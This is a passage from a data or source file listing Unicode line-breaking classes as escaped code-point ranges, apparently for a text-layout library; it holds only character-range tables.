\uc16f\uc171-\uc18b\uc18d-\uc1a7\uc1a9-\uc1c3\uc1c5-\uc1df\uc1e1-\uc1fb\uc1fd-\uc217\uc219-\uc233\uc235-\uc24f\uc251-\uc26b\uc26d-\uc287\uc289-\uc2a3\uc2a5-\uc2bf\uc2c1-\uc2db\uc2dd-\uc2f7\uc2f9-\uc313\uc315-\uc32f\uc331-\uc34b\uc34d-\uc367\uc369-\uc383\uc385-\uc39f\uc3a1-\uc3bb\uc3bd-\uc3d7\uc3d9-\uc3f3\uc3f5-\uc40f\uc411-\uc42b\uc42d-\uc447\uc449-\uc463\uc465-\uc47f\uc481-\uc49b\uc49d-\uc4b7\uc4b9-\uc4d3\uc4d5-\uc4ef\uc4f1-\uc50b\uc50d-\uc527\uc529-\uc543\uc545-\uc55f\uc561-\uc57b\uc57d-\uc597\uc599-\uc5b3\uc5b5-\uc5cf\uc5d1-\uc5eb\uc5ed-\uc607\uc609-\uc623\uc625-\uc63f\uc641-\uc65b\uc65d-\uc677\uc679-\uc693\uc695-\uc6af\uc6b1-\uc6cb\uc6cd-\uc6e7\uc6e9-\uc703\uc705-\uc71f\uc721-\uc73b\uc73d-\uc757\uc759-\uc773\uc775-\uc78f\uc791-\uc7ab\uc7ad-\uc7c7\uc7c9-\uc7e3\uc7e5-\uc7ff\uc801-\uc81b\uc81d-\uc837\uc839-\uc853\uc855-\uc86f\uc871-\uc88b\uc88d-\uc8a7\uc8a9-\uc8c3\uc8c5-\uc8df\uc8e1-\uc8fb\uc8fd-\uc917\uc919-\uc933\uc935-\uc94f\uc951-\uc96b\uc96d-\uc987\uc989-\uc9a3\uc9a5-\uc9bf\uc9c1-\uc9db\uc9dd-\uc9f7\uc9f9-\uca13\uca15-\uca2f\uca31-\uca4b\uca4d-\uca67\uca69-\uca83\uca85-\uca9f\ucaa1-\ucabb\ucabd-\ucad7\ucad9-\ucaf3\ucaf5-\ucb0f\ucb11-\ucb2b\ucb2d-\ucb47\ucb49-\ucb63\ucb65-\ucb7f\ucb81-\ucb9b\ucb9d-\ucbb7\ucbb9-\ucbd3\ucbd5-\ucbef\ucbf1-\ucc0b\ucc0d-\ucc27\ucc29-\ucc43\ucc45-\ucc5f\ucc61-\ucc7b\ucc7d-\ucc97\ucc99-\uccb3\uccb5-\ucccf\uccd1-\ucceb\ucced-\ucd07\ucd09-\ucd23\ucd25-\ucd3f\ucd41-\ucd5b\ucd5d-\ucd77\ucd79-\ucd93\ucd95-\ucdaf\ucdb1-\ucdcb\ucdcd-\ucde7\ucde9-\uce03\uce05-\uce1f\uce21-\uce3b\uce3d-\uce57\uce59-\uce73\uce75-\uce8f\uce91-\uceab\ucead-\ucec7\ucec9-\ucee3\ucee5-\uceff\ucf01-\ucf1b\ucf1d-\ucf37\ucf39-\ucf53\ucf55-\ucf6f\ucf71-\ucf8b\ucf8d-\ucfa7\ucfa9-\ucfc3\ucfc5-\ucfdf\ucfe1-\ucffb\ucffd-\ud017\ud019-\ud033\ud035-\ud04f\ud051-\ud06b\ud06d-\ud087\ud089-\ud0a3\ud0a5-\ud0bf\ud0c1-\ud0db\ud0dd-\ud0f7\ud0f9-\ud113\ud115-\ud12f\ud131-\ud14b\ud14d-\ud167\ud169-\ud183\ud185-\ud19f\ud1a1-\ud1bb\ud1bd-\ud1d7\ud1d9-\ud1f3\ud1f5-\ud20f\ud211-\ud22b\ud22d-\ud247\ud249-\ud263\ud265-\ud27f\ud281-\ud29b\ud29d-\ud2b7\ud2b9-\ud2d3\ud2d5-\ud2ef\ud2f1-\ud30b\ud30d-\ud327\ud329-\ud343\ud345-\ud35f\ud361-\ud37b\ud37d-\ud397\ud399-\ud3b3\ud3b5-\ud3cf\ud3d1-\ud3eb\ud3ed-\ud407\ud409-\ud423\ud425-\ud43f\ud441-\ud45b\ud45d-\ud477\ud479-\ud493\ud495-\ud4af\ud4b1-\ud4cb\ud4cd-\ud4e7\ud4e9-\ud503\ud505-\ud51f\ud521-\ud53b\ud53d-\ud557\ud559-\ud573\ud575-\ud58f\ud591-\ud5ab\ud5ad-\ud5c7\ud5c9-\ud5e3\ud5e5-\ud5ff\ud601-\ud61b\ud61d-\ud637\ud639-\ud653\ud655-\ud66f\ud671-\ud68b\ud68d-\ud6a7\ud6a9-\ud6c3\ud6c5-\ud6df\ud6e1-\ud6fb\ud6fd-\ud717\ud719-\ud733\ud735-\ud74f\ud751-\ud76b\ud76d-\ud787\ud789-\U0010ffff",
"^h3": "\x00-\uac00\uac1c\uac38\uac54\uac70\uac8c\uaca8\uacc4\uace0\uacfc\uad18\uad34\uad50\uad6c\uad88\uada4\uadc0\uaddc\uadf8\uae14\uae30\uae4c\uae68\uae84\uaea0\uaebc\uaed8\uaef4\uaf10\uaf2c\uaf48\uaf64\uaf80\uaf9c\uafb8\uafd4\uaff0\ub00c\ub028\ub044\ub060\ub07c\ub098\ub0b4\ub0d0\ub0ec\ub108\ub124\ub140\ub15c\ub178\ub194\ub1b0\ub1cc\ub1e8\ub204\ub220\ub23c\ub258\ub274\ub290\ub2ac\ub2c8\ub2e4\ub300\ub31c\ub338\ub354\ub370\ub38c\ub3a8\ub3c4\ub3e0\ub3fc\ub418\ub434\ub450\ub46c\ub488\ub4a4\ub4c0\ub4dc\ub4f8\ub514\ub530\ub54c\ub568\ub584\ub5a0\ub5bc\ub5d8\ub5f4\ub610\ub62c\ub648\ub664\ub680\ub69c\ub6b8\ub6d4\ub6f0\ub70c\ub728\ub744\ub760\ub77c\ub798\ub7b4\ub7d0\ub7ec\ub808\ub824\ub840\ub85c\ub878\ub894\ub8b0\ub8cc\ub8e8\ub904\ub920\ub93c\ub958\ub974\ub990\ub9ac\ub9c8\ub9e4\uba00\uba1c\uba38\uba54\uba70\uba8c\ubaa8\ubac4\ubae0\ubafc\ubb18\ubb34\ubb50\ubb6c\ubb88\ubba4\ubbc0\ubbdc\ubbf8\ubc14\ubc30\ubc4c\ubc68\ubc84\ubca0\ubcbc\ubcd8\ubcf4\ubd10\ubd2c\ubd48\ubd64\ubd80\ubd9c\ubdb8\ubdd4\ubdf0\ube0c\ube28\ube44\ube60\ube7c\ube98\ubeb4\ubed0\ubeec\ubf08\ubf24\ubf40\ubf5c\ubf78\ubf94\ubfb0\ubfcc\ubfe8\uc004\uc020\uc03c\uc058\uc074\uc090\uc0ac\uc0c8\uc0e4\uc100\uc11c\uc138\uc154\uc170\uc18c\uc1a8\uc1c4\uc1e0\uc1fc\uc218\uc234\uc250\uc26c\uc288\uc2a4\uc2c0\uc2dc\uc2f8\uc314\uc330\uc34c\uc368\uc384\uc3a0\uc3bc\uc3d8\uc3f4\uc410\uc42c\uc448\uc464\uc480\uc49c\uc4b8\uc4d4\uc4f0\uc50c\uc528\uc544\uc560\uc57c\uc598\uc5b4\uc5d0\uc5ec\uc608\uc624\uc640\uc65c\uc678\uc694\uc6b0\uc6cc\uc6e8\uc704\uc720\uc73c\uc758\uc774\uc790\uc7ac\uc7c8\uc7e4\uc800\uc81c\uc838\uc854\uc870\uc88c\uc8a8\uc8c4\uc8e0\uc8fc\uc918\uc934\uc950\uc96c\uc988\uc9a4\uc9c0\uc9dc\uc9f8\uca14\uca30\uca4c\uca68\uca84\ucaa0\ucabc\ucad8\ucaf4\ucb10\ucb2c\ucb48\ucb64\ucb80\ucb9c\ucbb8\ucbd4\ucbf0\ucc0c\ucc28\ucc44\ucc60\ucc7c\ucc98\uccb4\uccd0\uccec\ucd08\ucd24\ucd40\ucd5c\ucd78\ucd94\ucdb0\ucdcc\ucde8\uce04\uce20\uce3c\uce58\uce74\uce90\uceac\ucec8\ucee4\ucf00\ucf1c\ucf38\ucf54\ucf70\ucf8c\ucfa8\ucfc4\ucfe0\ucffc\ud018\ud034\ud050\ud06c\ud088\ud0a4\ud0c0\ud0dc\ud0f8\ud114\ud130\ud14c\ud168\ud184\ud1a0\ud1bc\ud1d8\ud1f4\ud210\ud22c\ud248\ud264\ud280\ud29c\ud2b8\ud2d4\ud2f0\ud30c\ud328\ud344\ud360\ud37c\ud398\ud3b4\ud3d0\ud3ec\ud408\ud424\ud440\ud45c\ud478\ud494\ud4b0\ud4cc\ud4e8\ud504\ud520\ud53c\ud558\ud574\ud590\ud5ac\ud5c8\ud5e4\ud600\ud61c\ud638\ud654\ud670\ud68c\ud6a8\ud6c4\ud6e0\ud6fc\ud718\ud734\ud750\ud76c\ud788\ud7a4-\U0010ffff",
"^hl": "\x00-\u05cf\u05eb-\u05ef\u05f3-\ufb1c\ufb1e\ufb29\ufb37\ufb3d\ufb3f\ufb42\ufb45\ufb50-\U0010ffff",
"^hy": "\x00-\x2c\x2e-\U0010ffff",
"^id": "\x00-\u2e7f\u2e9a\u2ef4-\u2eff\u2fd6-\u2fef\u2ffc-\u2fff\u3001-\u3002\u3005\u3008-\u3011\u3014-\u301f\u302a-\u302f\u303b-\u303c\u3040-\u3041\u3043\u3045\u3047\u3049\u3063\u3083\u3085\u3087\u308e\u3095-\u309e\u30a0-\u30a1\u30a3\u30a5\u30a7\u30a9\u30c3\u30e3\u30e5\u30e7\u30ee\u30f5-\u30f6\u30fb-\u30fe\u3100-\u3104\u312e-\u3130\u318f\u31bb-\u31bf\u31e4-\u31ff\u321f\u3248-\u324f\u32ff\u4dc0-\u4dff\ua015\ua48d-\ua48f\ua4c7-\uf8ff\ufb00-\ufe2f\ufe35-\ufe44\ufe47-\ufe48\ufe50\ufe52-\ufe57\ufe59-\ufe5e\ufe67\ufe69-\ufe6a\ufe6c-\uff01\uff04-\uff05\uff08-\uff09\uff0c\uff0e\uff1a-\uff1b\uff1f\uff3b\uff3d\uff5b\uff5d\uff5f-\uffe1\uffe5-\U0001afff\U0001b002-\U0001f1ff\U0001f203-\U0001f20f\U0001f23b-\U0001f23f\U0001f249-\U0001f24f\U0001f252-\U0001ffff\U0002fffe-\U0002ffff\U0003fffe-\U0010ffff",
"^in": "\x00-\u2023\u2027-\ufe18\ufe1a-\U0010ffff",
"^is": "\x00-\x2b\x5c\x2d\x2f-\x39\x3c-\u037d\u037f-\u0588\u058a-\u060b\u060e-\u07f7\u07f9-\u2043\u2045-\ufe0f\ufe11-\ufe12\ufe15-\U0010ffff",
"^jl": "\x00-\u10ff\u1160-\ua95f\ua97d-\U0010ffff",
"^jt": "\x00-\u11a7\u1200-\ud7ca\ud7fc-\U0010ffff",
"^jv": "\x00-\u115f\u11a8-\ud7af\ud7c7-\U0010ffff",
"^lf": "\x00-\x09\x0b-\U0010ffff",
"^nl": "\x00-\x84\x86-\U0010ffff",
"^ns": "\x00-\u17d5\u17d7-\u203b\u203e-\u2046\u204a-\u3004\u3006-\u301b\u301d-\u303a\u303d-\u309a\u309f\u30a1-\u30fa\u30fc\u30ff-\ua014\ua016-\ufe53\ufe56-\uff19\uff1c-\uff64\uff66-\uff9d\uffa0-\U0010ffff",
"^nu": "\x00-\x2f\x3a-\u065f\u066a\u066d-\u06ef\u06fa-\u07bf\u07ca-\u0965\u0970-\u09e5\u09f0-\u0a65\u0a70-\u0ae5\u0af0-\u0b65\u0b70-\u0be5\u0bf0-\u0c65\u0c70-\u0ce5\u0cf0-\u0d65\u0d70-\u0e4f\u0e5a-\u0ecf\u0eda-\u0f1f\u0f2a-\u103f\u104a-\u108f\u109a-\u17df\u17ea-\u180f\u181a-\u1945\u1950-\u19cf\u19da-\u1a7f\u1a8a-\u1a8f\u1a9a-\u1b4f\u1b5a-\u1baf\u1bba-\u1c3f\u1c4a-\u1c4f\u1c5a-\ua61f\ua62a-\ua8cf\ua8da-\ua8ff\ua90a-\ua9cf\ua9da-\uaa4f\uaa5a-\uabef\uabfa-\U0001049f\U000104aa-\U00011065\U00011070-\U000110ef\U000110fa-\U00011135\U00011140-\U000111cf\U000111da-\U000116bf\U000116ca-\U0001d7cd\U0001d800-\U0010ffff",
"^op": "\x00-\x27\x29-\x5a\x5c\x5c-\x7a\x5c\x7c-\xa0\xa2-\xbe\xc0-\u0f39\u0f3b\u0f3d-\u169a\u169c-\u2019\u201b-\u201d\u201f-\u2044\u2046-\u207c\u207e-\u208c\u208e-\u2328\u232a-\u2767\u2769\u276b\u276d\u276f\u2771\u2773\u2775-\u27c4\u27c6-\u27e5\u27e7\u27e9\u27eb\u27ed\u27ef-\u2982\u2984\u2986\u2988\u298a\u298c\u298e\u2990\u2992\u2994\u2996\u2998-\u29d7\u29d9\u29db-\u29fb\u29fd-\u2e17\u2e19-\u2e21\u2e23\u2e25\u2e27\u2e29-\u3007\u3009\u300b\u300d\u300f\u3011-\u3013\u3015\u3017\u3019\u301b-\u301c\u301e-\ufd3d\ufd3f-\ufe16\ufe18-\ufe34\ufe36\ufe38\ufe3a\ufe3c\ufe3e\ufe40\ufe42\ufe44-\ufe46\ufe48-\ufe58\ufe5a\ufe5c\ufe5e-\uff07\uff09-\uff3a\uff3c-\uff5a\uff5c-\uff5e\uff60-\uff61\uff63-\U00013257\U0001325b-\U00013285\U00013287\U00013289-\U00013378\U0001337a-\U0010ffff",
"^po": "\x00-\x24\x5c\x26-\xa1\xa3-\xaf\xb1-\u0608\u060c-\u0669\u066b-\u09f1\u09f4-\u09f8\u09fa-\u0d78\u0d7a-\u202f\u2038-\u20a6\u20a8-\u20b5\u20b7-\u2102\u2104-\u2108\u210a-\ua837\ua839-\ufdfb\ufdfd-\ufe69\ufe6b-\uff04\uff06-\uffdf\uffe1-\U0010ffff",
"^pr": "\x00-\x23\x25-\x2a\x2c-\x5c\x5b\x5c\x5d-\xa2\xa6-\xb0\xb2-\u058e\u0590-\u09fa\u09fc-\u0af0\u0af2-\u0bf8\u0bfa-\u0e3e\u0e40-\u17da\u17dc-\u209f\u20a7\u20b6\u20ba-\u2115\u2117-\u2211\u2214-\ufe68\ufe6a-\uff03\uff05-\uffe0\uffe2-\uffe4\uffe7-\U0010ffff",
"^qu": "\x00-\x21\x23-\x5c\x26\x28-\xaa\xac-\xba\xbc-\u2017\u201a\u201e\u2020-\u2038\u203b-\u275a\u275f-\u2dff\u2e0e-\u2e1b\u2e1e-\u2e1f\u2e22-\U0010ffff",
"^sa": "\x00-\u0e00\u0e3b-\u0e3f\u0e4f-\u0e80\u0e83\u0e85-\u0e86\u0e89\u0e8b-\u0e8c\u0e8e-\u0e93\u0e98\u0ea0\u0ea4\u0ea6\u0ea8-\u0ea9\u0eac\u0eba\u0ebe-\u0ebf\u0ec5\u0ec7\u0ece-\u0edb\u0ee0-\u0fff\u1040-\u104f\u1090-\u1099\u10a0-\u177f\u17d4-\u17d6\u17d8-\u17db\u17de-\u194f\u196e-\u196f\u1975-\u197f\u19ac-\u19af\u19ca-\u19d9\u19db-\u19dd\u19e0-\u1a1f\u1a5f\u1a7d-\u1a9f\u1aae-\uaa5f\uaa7c-\uaa7f\uaac3-\uaada\uaae0-\U0010ffff",
"^sg": "\x00-\ud7ff\ue000-\U0010ffff",
"^sp": "\x00-\x1f\x21-\U0010ffff",
"^sy": "\x00-\x2e\x30-\U0010ffff",
"^wj": "\x00-\u205f\u2061-\ufefe\uff00-\U0010ffff",
"^xx": "\x00-\u0377\u037a-\u037e\u0384-\u038a\u038c\u038e-\u03a1\u03a3-\u0527\u0531-\u0556\u0559-\u055f\u0561-\u0587\u0589-\u058a\u058f\u0591-\u05c7\u05d0-\u05ea\u05f0-\u05f4\u0600-\u0604\u0606-\u061b\u061e-\u070d\u070f-\u074a\u074d-\u07b1\u07c0-\u07fa\u0800-\u082d\u0830-\u083e\u0840-\u085b\u085e\u08a0\u08a2-\u08ac\u08e4-\u08fe\u0900-\u0977\u0979-\u097f\u0981-\u0983\u0985-\u098c\u098f-\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bc-\u09c4\u09c7-\u09c8\u09cb-\u09ce\u09d7\u09dc-\u09dd\u09df-\u09e3\u09e6-\u09fb\u0a01-\u0a03\u0a05-\u0a0a\u0a0f-\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32-\u0a33\u0a35-\u0a36\u0a38-\u0a39\u0a3c\u0a3e-\u0a42\u0a47-\u0a48\u0a4b-\u0a4d\u0a51\u0a59-\u0a5c\u0a5e\u0a66-\u0a75\u0a81-\u0a83\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2-\u0ab3\u0ab5-\u0ab9\u0abc-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ad0\u0ae0-\u0ae3\u0ae6-\u0af1\u0b01-\u0b03\u0b05-\u0b0c\u0b0f-\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32-\u0b33\u0b35-\u0b39\u0b3c-\u0b44\u0b47-\u0b48\u0b4b-\u0b4d\u0b56-\u0b57\u0b5c-\u0b5d\u0b5f-\u0b63\u0b66-\u0b77\u0b82-\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99-\u0b9a\u0b9c\u0b9e-\u0b9f\u0ba3-\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd0\u0bd7\u0be6-\u0bfa\u0c01-\u0c03\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55-\u0c56\u0c58-\u0c59\u0c60-\u0c63\u0c66-\u0c6f\u0c78-\u0c7f\u0c82-\u0c83\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbc-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5-\u0cd6\u0cde\u0ce0-\u0ce3\u0ce6-\u0cef\u0cf1-\u0cf2\u0d02-\u0d03\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d-\u0d44\u0d46-\u0d48\u0d4a-\u0d4e\u0d57\u0d60-\u0d63\u0d66-\u0d75\u0d79-\u0d7f\u0d82-\u0d83\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2-\u0df4\u0e01-\u0e3a\u0e3f-\u0e5b\u0e81-\u0e82\u0e84\u0e87-\u0e88\u0e8a\u0e8d\u0e94-\u0e97\u0e99-\u0e9f\u0ea1-\u0ea3\u0ea5\u0ea7\u0eaa-\u0eab\u0ead-\u0eb9\u0ebb-\u0ebd\u0ec0-\u0ec4\u0ec6\u0ec8-\u0ecd\u0ed0-\u0ed9\u0edc-\u0edf\u0f00-\u0f47\u0f49-\u0f6c\u0f71-\u0f97\u0f99-\u0fbc\u0fbe-\u0fcc\u0fce-\u0fda\u1000-\u10c5\u10c7\u10cd\u10d0-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u135d-\u137c\u1380-\u1399\u13a0-\u13f4\u1400-\u169c\u16a0-\u16f0\u1700-\u170c\u170e-\u1714\u1720-\u1736\u1740-\u1753\u1760-\u176c\u176e-\u1770\u1772-\u1773\u1780-\u17dd\u17e0-\u17e9\u17f0-\u17f9\u1800-\u180e\u1810-\u1819\u1820-\u1877\u1880-\u18aa\u18b0-\u18f5\u1900-\u191c\u1920-\u192b\u1930-\u193b\u1940\u1944-\u196d\u1970-\u1974\u1980-\u19ab\u19b0-\u19c9\u19d0-\u19da\u19de-\u1a1b\u1a1e-\u1a5e\u1a60-\u1a7c\u1a7f-\u1a89\u1a90-\u1a99\u1aa0-\u1aad\u1b00-\u1b4b\u1b50-\u1b7c\u1b80-\u1bf3\u1bfc-\u1c37\u1c3b-\u1c49\u1c4d-\u1c7f\u1cc0-\u1cc7\u1cd0-\u1cf6\u1d00-\u1de6\u1dfc-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fc4\u1fc6-\u1fd3\u1fd6-\u1fdb\u1fdd-\u1fef\u1ff2-\u1ff4\u1ff6-\u1ffe\u2000-\u2064\u206a-\u2071\u2074-\u208e\u2090-\u209c\u20a0-\u20b9\u20d0-\u20f0\u2100-\u2189\u2190-\u23f3\u2400-\u2426\u2440-\u244a\u2460-\u26ff\u2701-\u2b4c\u2b50-\u2b59\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2cf3\u2cf9-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f-\u2d70\u2d7f-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2de0-\u2e3b\u2e80-\u2e99\u2e9b-\u2ef3\u2f00-\u2fd5\u2ff0-\u2ffb\u3000-\u303f\u3041-\u3096\u3099-\u30ff\u3105-\u312d\u3131-\u318e\u3190-\u31ba\u31c0-\u31e3\u31f0-\u321e\u3220-\u32fe\u3300-\ua48c\ua490-\ua4c6\ua4d0-\ua62b\ua640-\ua697\ua69f-\ua6f7\ua700-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua82b\ua830-\ua839\ua840-\ua877\ua880-\ua8c4\ua8ce-\ua8d9\ua8e0-\ua8fb\ua900-\ua953\ua95f-\ua97c\ua980-\ua9cd\ua9cf-\ua9d9\ua9de-\ua9df\uaa00-\uaa36\uaa40-\uaa4d\uaa50-\uaa59\uaa5c-\uaa7b\uaa80-\uaac2\uaadb-\uaaf6\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabed\uabf0-\uabf9\uac00-\ud7a3\ud7b0-\ud7c6\ud7cb-\ud7fb\ud800-\udfff\uf900-\ufb06\ufb13-\ufb17\ufb1d-\ufb36\ufb38-\ufb3c\ufb3e\ufb40-\ufb41\ufb43-\ufb44\ufb46-\ufbc1\ufbd3-\ufd3f\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfd\ufe00-\ufe19\ufe20-\ufe26\ufe30-\ufe52\ufe54-\ufe66\ufe68-\ufe6b\ufe70-\ufe74\ufe76-\ufefc\ufeff\uff01-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc\uffe0-\uffe6\uffe8-\uffee\ufff9-\ufffd\U00010000-\U0001000b\U0001000d-\U00010026\U00010028-\U0001003a\U0001003c-\U0001003d\U0001003f-\U0001004d\U00010050-\U0001005d\U00010080-\U000100fa\U00010100-\U00010102\U00010107-\U00010133\U00010137-\U0001018a\U00010190-\U0001019b\U000101d0-\U000101fd\U00010280-\U0001029c\U000102a0-\U000102d0\U00010300-\U0001031e\U00010320-\U00010323\U00010330-\U0001034a\U00010380-\U0001039d\U0001039f-\U000103c3\U000103c8-\U000103d5\U00010400-\U0001049d\U000104a0-\U000104a9\U00010800-\U00010805\U00010808\U0001080a-\U00010835\U00010837-\U00010838\U0001083c\U0001083f-\U00010855\U00010857-\U0001085f\U00010900-\U0001091b\U0001091f-\U00010939\U0001093f\U00010980-\U000109b7\U000109be-\U000109bf\U00010a00-\U00010a03\U00010a05-\U00010a06\U00010a0c-\U00010a13\U00010a15-\U00010a17\U00010a19-\U00010a33\U00010a38-\U00010a3a\U00010a3f-\U00010a47\U00010a50-\U00010a58\U00010a60-\U00010a7f\U00010b00-\U00010b35\U00010b39-\U00010b55\U00010b58-\U00010b72\U00010b78-\U00010b7f\U00010c00-\U00010c48\U00010e60-\U00010e7e\U00011000-\U0001104d\U00011052-\U0001106f\U00011080-\U000110c1\U000110d0-\U000110e8\U000110f0-\U000110f9\U00011100-\U00011134\U00011136-\U00011143\U00011180-\U000111c8\U000111d0-\U000111d9\U00011680-\U000116b7\U000116c0-\U000116c9\U00012000-\U0001236e\U00012400-\U00012462\U00012470-\U00012473\U00013000-\U0001342e\U00016800-\U00016a38\U00016f00-\U00016f44\U00016f50-\U00016f7e\U00016f8f-\U00016f9f\U0001b000-\U0001b001\U0001d000-\U0001d0f5\U0001d100-\U0001d126\U0001d129-\U0001d1dd\U0001d200-\U0001d245\U0001d300-\U0001d356\U0001d360-\U0001d371\U0001d400-\U0001d454\U0001d456-\U0001d49c\U0001d49e-\U0001d49f\U0001d4a2\U0001d4a5-\U0001d4a6\U0001d4a9-\U0001d4ac\U0001d4ae-\U0001d4b9\U0001d4bb\U0001d4bd-\U0001d4c3\U0001d4c5-\U0001d505\U0001d507-\U0001d50a\U0001d50d-\U0001d514\U0001d516-\U0001d51c\U0001d51e-\U0001d539\U0001d53b-\U0001d53e\U0001d540-\U0001d544\U0001d546\U0001d54a-\U0001d550\U0001d552-\U0001d6a5\U0001d6a8-\U0001d7cb\U0001d7ce-\U0001d7ff\U0001ee00-\U0001ee03\U0001ee05-\U0001ee1f\U0001ee21-\U0001ee22\U0001ee24\U0001ee27\U0001ee29-\U0001ee32\U0001ee34-\U0001ee37\U0001ee39\U0001ee3b\U0001ee42\U0001ee47\U0001ee49\U0001ee4b\U0001ee4d-\U0001ee4f\U0001ee51-\U0001ee52\U0001ee54\U0001ee57\U0001ee59\U0001ee5b\U0001ee5d\U0001ee5f\U0001ee61-\U0001ee62\U0001ee64\U0001ee67-\U0001ee6a\U0001ee6c-\U0001ee72\U0001ee74-\U0001ee77\U0001ee79-\U0001ee7c\U0001ee7e\U0001ee80-\U0001ee89\U0001ee8b-\U0001ee9b\U0001eea1-\U0001eea3\U0001eea5-\U0001eea9\U0001eeab-\U0001eebb\U0001eef0-\U0001eef1\U0001f000-\U0001f02b\U0001f030-\U0001f093\U0001f0a0-\U0001f0ae\U0001f0b1-\U0001f0be\U0001f0c1-\U0001f0cf\U0001f0d1-\U0001f0df\U0001f100-\U0001f10a\U0001f110-\U0001f12e\U0001f130-\U0001f16b\U0001f170-\U0001f19a\U0001f1e6-\U0001f202\U0001f210-\U0001f23a\U0001f240-\U0001f248\U0001f250-\U0001f251\U0001f300-\U0001f320\U0001f330-\U0001f335\U0001f337-\U0001f37c\U0001f380-\U0001f393\U0001f3a0-\U0001f3c4\U0001f3c6-\U0001f3ca\U0001f3e0-\U0001f3f0\U0001f400-\U0001f43e\U0001f440\U0001f442-\U0001f4f7\U0001f4f9-\U0001f4fc\U0001f500-\U0001f53d\U0001f540-\U0001f543\U0001f550-\U0001f567\U0001f5fb-\U0001f640\U0001f645-\U0001f64f\U0001f680-\U0001f6c5\U0001f700-\U0001f773\U00020000-\U0002fffd\U00030000-\U0003fffd\U000e0001\U000e0020-\U000e007f\U000e0100-\U000e01ef",
"^zw": "\x00-\u200a\u200c-\U0010ffff",
"ai": "\xa7-\xa8\xaa\xb2-\xb3\xb6-\xba\xbc-\xbe\xd7\xf7\u02c7\u02c9-\u02cb\u02cd\u02d0\u02d8-\u02db\u02dd\u2015-\u2016\u2020-\u2021\u203b\u2074\u207f\u2081-\u2084\u2105\u2113\u2121-\u2122\u212b\u2154-\u2155\u215b\u215e\u2160-\u216b\u2170-\u2179\u2189\u2190-\u2199\u21d2\u21d4\u2200\u2202-\u2203\u2207-\u2208\u220b\u220f\u2211\u2215\u221a\u221d-\u2220\u2223\u2225\u2227-\u222c\u222e\u2234-\u2237\u223c-\u223d\u2248\u224c\u2252\u2260-\u2261\u2264-\u2267\u226a-\u226b\u226e-\u226f\u2282-\u2283\u2286-\u2287\u2295\u2299\u22a5\u22bf\u2312\u2460-\u24fe\u2500-\u254b\u2550-\u2574\u2580-\u258f\u2592-\u2595\u25a0-\u25a1\u25a3-\u25a9\u25b2-\u25b3\u25b6-\u25b7\u25bc-\u25bd\u25c0-\u25c1\u25c6-\u25c8\u25cb\u25ce-\u25d1\u25e2-\u25e5\u25ef\u2605-\u2606\u2609\u260e-\u260f\u2614-\u2617\u261c\u261e\u2640\u2642\u2660-\u2661\u2663-\u2665\u2667-\u266a\u266c-\u266d\u266f\u269e-\u269f\u26be-\u26bf\u26c4-\u26cd\u26cf-\u26e1\u26e3\u26e8-\u26ff\u2757\u2776-\u2793\u2b55-\u2b59\u3248-\u324f\ufffd\U0001f100-\U0001f10a\U0001f110-\U0001f12d\U0001f130-\U0001f169\U0001f170-\U0001f19a",
"al": "\x23\x5c\x26\x2a\x3c-\x3e\x40-\x5a\x5c\x5e-\x7a\x5c\x7e\xa6\xa9\xac\xae-\xaf\xb5\xc0-\xd6\xd8-\xf6\xf8-\u02c6\u02ce-\u02cf\u02d1-\u02d7\u02dc\u02de\u02e0-\u02ff\u0370-\u0377\u037a-\u037d\u0384-\u038a\u038c\u038e-\u03a1\u03a3-\u0482\u048a-\u0527\u0531-\u0556\u0559-\u055f\u0561-\u0587\u05c0\u05c3\u05f3-\u05f4\u0600-\u0604\u0606-\u0608\u060e-\u060f\u0620-\u064a\u066d-\u066f\u0671-\u06d3\u06d5\u06dd-\u06de\u06e5-\u06e6\u06e9\u06ee-\u06ef\u06fa-\u070d\u070f-\u0710\u0712-\u072f\u074d-\u07a5\u07b1\u07ca-\u07ea\u07f4-\u07f7\u07fa\u0800-\u0815\u081a\u0824\u0828\u0830-\u083e\u0840-\u0858\u085e\u08a0\u08a2-\u08ac\u0904-\u0939\u093d\u0950\u0958-\u0961\u0970-\u0977\u0979-\u097f\u0985-\u098c\u098f-\u0990\u0993-\u09a8\u09aa-\u09b0\u09b2\u09b6-\u09b9\u09bd\u09ce\u09dc-\u09dd\u09df-\u09e1\u09f0-\u09f1\u09f4-